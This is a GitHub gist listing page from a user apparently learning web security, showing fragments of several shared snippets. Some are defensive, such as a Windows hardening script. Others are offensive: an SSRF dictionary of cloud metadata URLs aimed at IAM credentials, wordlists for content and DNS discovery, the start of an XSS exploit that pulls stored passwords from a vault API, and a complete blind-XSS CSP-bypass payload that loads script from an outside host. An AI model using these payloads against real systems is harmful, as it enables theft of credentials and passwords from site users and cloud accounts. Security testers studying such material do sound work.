Skip to content

Instantly share code, notes, and snippets.

View Hasanabas's full-sized avatar
👨‍💻
Learning Web Security

Hasanabas

👨‍💻
Learning Web Security
View GitHub Profile
import sys
def to_octets(ip):
return [int(i) for i in ip.split('.')]
def dotless_decimal(ip):
octets = to_octets(ip)
result = octets[0] * 16777216 + octets[1] * \
@sjas
sjas / windows_hardening.cmd
Created November 24, 2017 05:21 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@jhaddix
jhaddix / Testing_Checklist.md
Last active June 3, 2026 12:47 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@jhaddix
jhaddix / cloud_metadata.txt
Last active July 12, 2026 15:28 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@streaak
streaak / all.txt
Last active November 6, 2018 20:31 — forked from jhaddix/all.txt
all wordlists for every dns enumeration tool... ever.
0
00
0-0
000
0000
00000
000000
000005
00001
00002
@streaak
streaak / wappalyzer.sh
Last active November 6, 2018 20:30
Wappalyzer against urls.txt
cat /root/aquatone/$1/urls.txt | parallel -j 5 node /usr/lib/node_modules/npm/node_modules/wappalyzer/index.js {} | jq -r '[(.urls | keys[] as $k | "\($k)"),.applications[].name]' -c >> /root/aquatone/$1/wappalyzer.txt
@shawarkhanethicalhacker
shawarkhanethicalhacker / password_vault_exploit.js
Created August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)